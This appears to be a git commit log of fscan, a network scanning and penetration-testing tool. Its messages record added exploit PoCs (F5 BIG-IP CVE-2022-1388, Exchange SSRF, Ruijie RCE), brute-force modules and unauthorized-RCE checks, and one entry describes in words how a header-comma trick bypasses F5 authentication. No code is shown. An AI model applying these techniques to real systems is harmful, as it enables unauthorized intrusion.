jindaxia	85e636fcea	fix: 修复2022-188的poc header里面Connection属性keep-alive后面的逗号"," 使得后面的x auth token字段解析出现错误, 从而绕过验证	2022-05-19 17:34:57 +08:00
jindaxia	2cef5c66d6	poc: add f5 big-ip cve-2022-1388 poc	2022-05-19 11:02:50 +08:00
影舞者	11fb239c61	update	2022-05-12 17:56:32 +08:00
影舞者	4915539fb3	fix bug	2022-05-12 11:56:01 +08:00
影舞者	55825f3b7c	Merge pull request #170 from ccreater222/main update proxy timeout	2022-05-09 14:52:55 +08:00
ccreater	c67d09371f	Merge branch 'main' of github.com:ccreater222/fscan	2022-05-09 13:27:25 +08:00
ccreater	9f27655182	beautify	2022-05-09 13:26:42 +08:00
影舞者	0b8c0ccc96	Update webtitle.go	2022-05-09 12:27:05 +08:00
影舞者	5bb7502ba3	Merge pull request #169 from ccreater222/main 添加了socks5支持	2022-05-09 12:11:09 +08:00
影舞者	ab60c985a6	Update client.go	2022-05-09 12:08:29 +08:00
ccreater	5c112e0ca8	fix bug	2022-05-08 02:19:41 +08:00
ccreater	6f15f835f0	handle error	2022-05-08 00:16:58 +08:00
ccreater	d774023da7	add socks5 support	2022-05-07 23:46:22 +08:00
影舞者	df527adda9	-h 支持域名	2022-04-28 17:08:52 +08:00
影舞者	2d496cafc9	-h 支持域名	2022-04-28 17:02:48 +08:00
影舞者	584771114d	add lock	2022-04-27 11:49:16 +08:00
影舞者	5dcb789e33	update image	2022-04-27 11:49:16 +08:00
影舞者	bb544cfbf3	update README.md	2022-04-21 09:56:07 +08:00
影舞者	c4950e2a93	poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程	2022-04-20 17:54:45 +08:00
影舞者	4c51ae1f2a	poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程	2022-04-20 17:45:27 +08:00
影舞者	d1ff89676d	取消webscan模块60s超时,减少漏报	2022-03-11 16:13:31 +08:00
影舞者	9527fcf0c7	update	2022-02-28 10:35:50 +08:00
影舞者	a01599ee7c	新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito	2022-02-25 16:49:17 +08:00
影舞者	c64c64477b	新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito	2022-02-25 15:29:45 +08:00
影舞者	2ebda8baa9	update webtitle	2022-02-17 14:37:06 +08:00
影舞者	ed99ee0fad	add向日葵指纹	2022-02-16 16:48:02 +08:00
影舞者	0b8e1ddaf9	update	2022-02-11 09:30:50 +08:00
影舞者	ddf824b985	update	2022-02-09 10:09:41 +08:00
影舞者	8acb02dc30	update go.mod	2022-01-15 14:07:39 +08:00
影舞者	c594f9f350	update go.sum	2022-01-14 16:52:59 +08:00
影舞者	e24168e895	update go.mod	2022-01-13 13:38:53 +08:00
影舞者	3b23c93c35	新增oracle密码爆破	2022-01-11 10:30:00 +08:00
影舞者	c59a5c3553	新增oracle密码爆破	2022-01-11 10:26:06 +08:00
影舞者	6db53c8cea	update	2022-01-10 23:15:40 +08:00
影舞者	ebf990eca0	update nobr	2022-01-10 16:48:28 +08:00
shadow1ng	9b6596315e	update	2022-01-08 14:46:26 +08:00
shadow1ng	bdeaae9dcf	update webscan timeout	2022-01-08 13:31:52 +08:00
影舞者	a56144d84a	update http	2022-01-07 17:58:34 +08:00
影舞者	49a3b94c53	update http	2022-01-07 17:45:13 +08:00
影舞者	c3fc054912	update http	2022-01-07 16:59:05 +08:00
影舞者	205021afec	update http	2022-01-07 16:54:23 +08:00
影舞者	dbb6f43fc1	新增LiveTop功能,检测存活时,默认会输出top10的b、c段ip存活数量	2022-01-07 14:56:48 +08:00
影舞者	0b22898547	新增LiveTop功能,检测存活时,默认会输出top10的b、c段ip存活数量	2022-01-07 13:46:09 +08:00
影舞者	6ce60284bc	新增LiveTop功能,检测存活时,默认会输出top10的b、c段ip存活数量	2022-01-07 13:38:38 +08:00
影舞者	60cd94d459	ip/8时,只探测部分机器	2022-01-07 11:06:06 +08:00
影舞者	b80ea1316f	ip/8时,只探测部分机器	2022-01-07 10:51:36 +08:00
影舞者	d1bcc60bcb	updata go.sum	2021-12-08 16:45:51 +08:00
影舞者	17544b375b	新增rdp扫描,新增添加端口参数-pa 3389(会在原有端口列表基础上,新增该端口)	2021-12-07 17:28:56 +08:00
影舞者	edb6920622	新增rdp扫描,新增添加端口参数-pa 3389(会在原有端口列表基础上,新增该端口)	2021-12-07 17:20:49 +08:00
影舞者	e1a4bfabfc	新增rdp扫描,新增添加端口参数-pa 3389(会在原有端口列表基础上,新增该端口)	2021-12-07 17:06:50 +08:00
影舞者	f71b4ab68f	Merge pull request #121 from Dawnnnnnn/feature/add-upx-compress feat(*): add `upx --best` for most elf	2021-12-07 14:50:47 +08:00
dawnnnnnn	bd0bcb4b66	feat(*): add `upx --best` for most elf	2021-12-06 17:42:25 +08:00
影舞者	b93df1ab20	update readme	2021-12-03 10:58:47 +08:00
影舞者	dc634f9184	update	2021-12-03 10:21:47 +08:00
影舞者	e875f4f930	fix bug	2021-12-03 09:30:03 +08:00
影舞者	6807508b69	update	2021-12-01 15:25:09 +08:00
影舞者	4a34745091	优化ip解析模块	2021-12-01 15:22:48 +08:00
影舞者	e49e6dd433	增加爆破关闭参数 -nobr	2021-11-25 10:16:39 +08:00
影舞者	dd00ec7bac	优化xray解析模块,支持groups、新增poc	2021-11-16 15:04:53 +08:00
影舞者	b06d7ac94c	优化xray解析模块,支持groups、新增poc	2021-11-16 14:42:35 +08:00
影舞者	858c28724b	Merge pull request #110 from Dawnnnnnn/function/goreleaser 新增Github-Action打包及一个敏感端口(10250)	2021-11-08 16:32:20 +08:00
dawnnnnnn	e56713fdf0	feat(*): add k8s port 10250 scan	2021-11-08 15:03:55 +08:00
dawnnnnnn	c4446ee357	ci(*): add goreleaser ci support windows-amd64/386 linux-amd64/386/arm64/mips64 darwin-amd64/arm64 etc.	2021-11-08 15:00:19 +08:00
影舞者	10d4b19897	Update ms17010.go	2021-10-14 15:51:52 +08:00
影舞者	21180c3da8	Update config.go	2021-10-13 09:39:58 +08:00
影舞者	30d1e6d9ca	Update scanner.go	2021-10-13 09:36:10 +08:00
影舞者	e9292dc7ad	update	2021-10-13 09:29:24 +08:00
影舞者	70f1c6bd71	Rename ms17017.go to ms17010.go	2021-10-11 18:09:32 +08:00
影舞者	5f981089a1	-hf ip.txt,遇到解析失败后进行跳过，代替原有的退出	2021-10-11 17:58:26 +08:00
影舞者	dc267a5335	添加功能,跳过某些ip扫描，-hn 192.168.1.1/24	2021-09-14 12:16:01 +08:00
影舞者	37f53e3f16	update	2021-09-13 17:19:36 +08:00
影舞者	734f8520fc	update	2021-09-13 15:07:21 +08:00
影舞者	53df72db02	add zabbix-default-password.yml	2021-09-13 10:33:14 +08:00
影舞者	842ee37594	add License.txt	2021-09-12 14:38:28 +08:00
影舞者	b4e33c5127	update ParseUser()	2021-09-11 16:43:38 +08:00
影舞者	0733c10a05	加入https判断(tls握手包)	2021-09-10 22:43:50 +08:00
影舞者	297aba6c4f	更新指纹、优化内存占用	2021-09-10 21:07:50 +08:00
影舞者	d5665f03d6	更新指纹、优化内存占用	2021-09-10 20:32:51 +08:00
影舞者	2e452a9695	Merge pull request #94 from NAXG/main 修改拼写	2021-09-08 15:17:50 +08:00
影舞者	07633cb24d	Merge pull request #92 from Richard-Tang/main 修改拼写	2021-09-08 15:09:58 +08:00
刘德华	5104cb9980	update ParseIP.go	2021-09-05 20:53:08 +08:00
RichardTang	24d8cc775c	修改拼写错误 SprintBoot拼写错误，修正为SpringBoot。	2021-09-01 22:53:10 +08:00
影舞者	922da8f168	Update ruijie-rce-cnvd-2021-09650.yml	2021-08-31 11:17:46 +08:00
影舞者	65df3de81d	添加免责声明	2021-08-30 15:18:05 +08:00
影舞者	71ff6e9a0c	Update README.md	2021-08-06 13:34:55 +08:00
影舞者	dc949e25b1	Merge pull request #79 from lanyi1998/main 修复两个线程阻塞的问题	2021-07-20 11:31:46 +08:00
影舞者	6a4bbe3781	Update mongodb.go	2021-07-20 11:30:49 +08:00
影舞者	c322700c6d	Update redis.go	2021-07-20 11:29:43 +08:00
影舞者	f64b185e6d	Update mongodb.go	2021-07-20 11:25:25 +08:00
lanyi	71024954e2	fix bug	2021-07-20 10:20:41 +08:00
影舞者	1499c7253a	Merge pull request #73 from IanSmith123/patch-1 update	2021-07-07 09:54:11 +08:00
shadow1ng	d38e38e17a	更新指纹,修改poc的bug	2021-06-30 16:26:17 +08:00
Les1ie	ddb5a9f228	fix: typo in flag usage string	2021-06-30 11:07:24 +08:00
影舞者	ceb585d018	Merge pull request #70 from canc3s/main add weblogic-console-weak	2021-06-21 17:30:29 +08:00
canc3s	3d3ecac605	add weblogic-console-weak add weblogic-console-weak	2021-06-21 17:22:27 +08:00
shadow1ng	1437ac60ff	增加2375端口,扫描docker未授权rce漏洞	2021-06-21 10:17:29 +08:00
shadow1ng	c8ec4eab79	update README.md	2021-06-18 12:31:27 +08:00
shadow1ng	80fe8548c1	update icmp	2021-06-18 11:45:47 +08:00
shadow1ng	ad1c53e3f4	更新poc	2021-06-18 10:30:01 +08:00
shadow1ng	a8835a9fe4	Merge remote-tracking branch 'origin/main' into main	2021-06-18 09:57:27 +08:00
影舞者	db8acb2828	Merge pull request #67 from canc3s/main 改善了poc机制和修复bug 还改善了一下poc的机制，如果识别出指纹会根据指纹信息发送poc，如果没有识别到指纹才会把所有poc打一遍	2021-06-18 09:46:54 +08:00
影舞者	288338bc9d	Update go.sum	2021-06-18 09:45:13 +08:00
影舞者	0743e4cb68	Update check.go	2021-06-18 09:38:30 +08:00
影舞者	6cdf1e19dc	Update go.mod	2021-06-18 09:37:23 +08:00
canc3s	a427833e3f	fix bug 改善了poc机制和修复bug	2021-06-17 20:32:53 +08:00
影舞者	d974523d88	Update ssh.go	2021-06-09 11:32:59 +08:00
shadow1ng	c90c9272f0	update	2021-06-09 11:16:23 +08:00
影舞者	a9e78b6de3	Merge pull request #63 from 7ten7/dev 添加一个海康威视摄像头指纹	2021-06-08 11:32:54 +08:00
7TEN7	ca1e0c791c	添加一个海康威视摄像头指纹	2021-06-08 01:07:39 +08:00
shadow1ng	90ef895e0f	ssh模块加入私钥连接	2021-05-31 10:03:01 +08:00
shadow1ng	162d1dd3a3	优化icmp模块	2021-05-29 20:16:01 +08:00
shadow1ng	f3b0c4a6d2	update	2021-05-29 15:58:16 +08:00
shadow1ng	936c1f5395	update	2021-05-29 15:55:05 +08:00
shadow1ng	9d385eb26a	加入fcgi协议未授权命令执行扫描,优化poc模块	2021-05-29 12:13:10 +08:00
shadow1ng	61e814119d	修复ssh跳过问题	2021-05-27 14:19:21 +08:00
shadow1ng	f5c9667f91	webtitle update	2021-05-20 09:34:27 +08:00
shadow1ng	4f3ff608ab	webtitle模块加入chardet	2021-05-18 16:23:50 +08:00
shadow1ng	0dd41e2917	更新指纹	2021-05-16 10:47:29 +08:00
shadow1ng	7031d78439	update redeme.md	2021-05-15 11:54:17 +08:00
shadow1ng	4431b42b35	添加打印机指纹	2021-05-14 16:02:22 +08:00
shadow1ng	b6133c4a55	增加-silent 静默扫描模式	2021-05-14 11:47:30 +08:00
shadow1ng	ef6a196de7	增加silent 静默扫描模式	2021-05-14 10:43:26 +08:00
shadow1ng	cd53258f0d	修复netbios模块数组越界	2021-05-14 10:24:04 +08:00
shadow1ng	93245a16d0	添加一个CheckErrs字典	2021-05-13 18:06:14 +08:00
shadow1ng	79aa24fc8f	webtitle 增加gzip解码	2021-05-12 10:57:12 +08:00
shadow1ng	9aba1c88a3	删除elasticsearchScan,用yml poc代替	2021-05-06 11:44:38 +08:00
shadow1ng	400f4373c9	更新mod库、编码、poc等	2021-05-06 11:39:58 +08:00
shadow1ng	402add56c7	更新mod库、编码、poc等	2021-05-06 11:37:29 +08:00
shadow1ng	7294051b44	修改webtitle模块,加入gbk解码,减少乱码	2021-04-22 23:41:56 +08:00
shadow1ng	f1163fc3d7	加入 404星链	2021-04-22 12:06:03 +08:00
shadow1ng	2466fc3ea7	加入netbios探测、域控识别	2021-04-21 16:12:38 +08:00
shadow1ng	e2eba97114	加入netbios探测、域控识别	2021-04-21 16:02:52 +08:00
shadow1ng	fcbebab2ca	加入netbios探测、域控识别	2021-04-21 15:49:28 +08:00
shadow1ng	ab31738807	加入netbios探测、域控识别	2021-04-21 15:34:59 +08:00
shadow1ng	6bca014fda	加入netbios探测、域控识别	2021-04-21 15:34:29 +08:00
shadow1ng	27324dc4a5	加入netbios探测、域控识别	2021-04-21 00:13:04 +08:00
shadow1ng	323d786c66	update	2021-04-18 14:03:07 +08:00
shadow1ng	78fb5339e6	更新字典	2021-04-18 12:02:14 +08:00
shadow1ng	0d4299c23d	更新poc	2021-04-18 10:48:54 +08:00
shadow1ng	064617d93c	更新poc	2021-04-18 10:43:00 +08:00
shadow1ng	5537eb8b80	更新 CheckErrs	2021-04-18 10:38:46 +08:00
shadow1ng	067322203d	更新 CheckErrs	2021-04-01 10:39:01 +08:00
shadow1ng	7f2f7df67e	修改-debug参数,自定义打印当前进度时间,默认100秒没进制就会输出。-debug 0时,有err时就会输出	2021-03-31 17:58:40 +08:00
shadow1ng	6fae8bf277	修改-debug参数,自定义打印当前进度时间,默认100秒没进制就会输出。-debug 0时,有err时就会输出	2021-03-31 17:21:32 +08:00
shadow1ng	f4b6ecc363	添加exchange_ssrf_poc	2021-03-31 17:03:33 +08:00
shadow1ng	559d6c7c4b	修改线程处理机制	2021-03-30 22:33:16 +08:00
shadow1ng	7535fdace7	修改线程处理机制	2021-03-30 22:30:16 +08:00
shadow1ng	d6e8d37ce8	修改线程处理机制	2021-03-30 18:16:18 +08:00
shadow1ng	e43a7f5610	修改线程处理机制	2021-03-30 18:12:54 +08:00
shadow1ng	05d746bec4	update readme	2021-03-25 23:15:10 +08:00
shadow1ng	f7989d84bf	update	2021-03-25 15:39:48 +08:00
shadow1ng	d503f55693	添加2个指纹	2021-03-25 15:36:21 +08:00
shadow1ng	e866d68f10	修改redis recover模块	2021-03-18 16:25:31 +08:00
shadow1ng	bb3222451c	修复一个错误拼写	2021-03-10 17:41:02 +08:00
shadow1ng	764e7723e1	修复一个错误拼写	2021-03-10 17:34:02 +08:00
shadow1ng	66cd740580	修复一个错误拼写	2021-03-10 14:42:30 +08:00
shadow1ng	41ec4489da	优化一下-m显示	2021-03-09 17:21:27 +08:00
shadow1ng	6ed5967705	添加redis还原dbname、dir	2021-03-09 17:00:06 +08:00
shadow1ng	d311d8cb79	调整portscan结构	2021-03-08 10:16:21 +08:00
shadow1ng	3ca56ff222	调整portscan结构	2021-03-08 10:00:56 +08:00
影舞者	5b330bb12d	Merge pull request #32 from 7ten7/dev 修复 -p 参数在某些情况下以范围指定端口时(如 -p 8000-10000)解析错误问题	2021-03-06 01:35:56 +08:00
7TEN7	089502eb52	修复 -p 参数在某些情况下以范围指定端口时(如 -p 8000-10000)解析错误问题	2021-03-06 01:13:46 +08:00
shadow1ng	34706e6bca	修复一个web超时的bug	2021-03-05 11:44:21 +08:00
shadow1ng	ba85e2178e	支持-u url或者-uf url.txt,进行url批量扫描	2021-03-04 14:48:51 +08:00
shadow1ng	5e7def5085	支持-u url或者-uf url.txt,进行url批量扫描	2021-03-04 14:42:10 +08:00
影舞者	423c0bebea	Merge pull request #30 from madneal/main fix for a judgement	2021-03-03 09:36:49 +08:00
Neal Caffery	f3a3dd2f8c	fix for a judgement	2021-03-03 09:24:17 +08:00
madneal	ae2a4621d4	no need for this judgement	2021-03-02 22:56:20 +08:00
影舞者	d79194389d	Merge pull request #28 from MaxSecurity/main 因为添加embed模块没更新go.mod导致无法正常编译报错	2021-03-02 10:24:49 +08:00
Doctor_Who丶Max	86b91c1c2e	Update go.mod	2021-03-02 10:21:32 +08:00
影舞者	5c000b2ffc	Merge pull request #27 from madneal/main fix typos	2021-03-01 22:06:29 +08:00
madneal	2ed5948d08	fix typos and replace Println with Printf	2021-03-01 22:02:27 +08:00
madneal	eb4cece0f9	replace Println with Printf	2021-03-01 21:59:47 +08:00
madneal	021592c237	fix typos	2021-03-01 21:55:19 +08:00
shadow1ng	8664cf3833	修改、添加poc	2021-02-28 15:20:18 +08:00
shadow1ng	41deddb132	修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml	2021-02-25 19:53:58 +08:00
shadow1ng	0df4e314d1	修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml	2021-02-25 17:54:56 +08:00
shadow1ng	79ea046ed2	修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml	2021-02-25 17:53:35 +08:00
shadow1ng	db5023c4c4	减少http client初始化次数	2021-02-21 15:06:25 +08:00
shadow1ng	51b8b2c0e2	减少http client初始化次数	2021-02-21 14:54:40 +08:00
shadow1ng	583e51d479	减少http client初始化次数	2021-02-21 14:52:31 +08:00
shadow1ng	14c9847f88	增加指纹识别功能,可识别尝试CMS、框架,如致远OA、通达OA等	2021-02-08 15:13:56 +08:00
shadow1ng	f25eedff67	增加指纹识别功能,可识别尝试CMS、框架,如致远OA、通达OA等	2021-02-08 15:12:59 +08:00
shadow1ng	3089484f52	增加指纹识别功能,可识别尝试CMS、框架,如致远OA、通达OA等	2021-02-08 15:11:43 +08:00
shadow1ng	6b2fa57cd0	修复poc发包时16进制payload的bug	2021-02-08 11:11:27 +08:00
shadow1ng	9ba3ec7054	修改icmp发包模式,更适合大规模探测。	2021-02-05 16:08:28 +08:00
shadow1ng	8e148c0e6e	修改icmp发包模式,更适合大规模探测。修改报错提示,--debug时,如果10秒内没有LogSuccess的消息,每隔10秒就会打印一下当前进度	2021-02-05 16:05:44 +08:00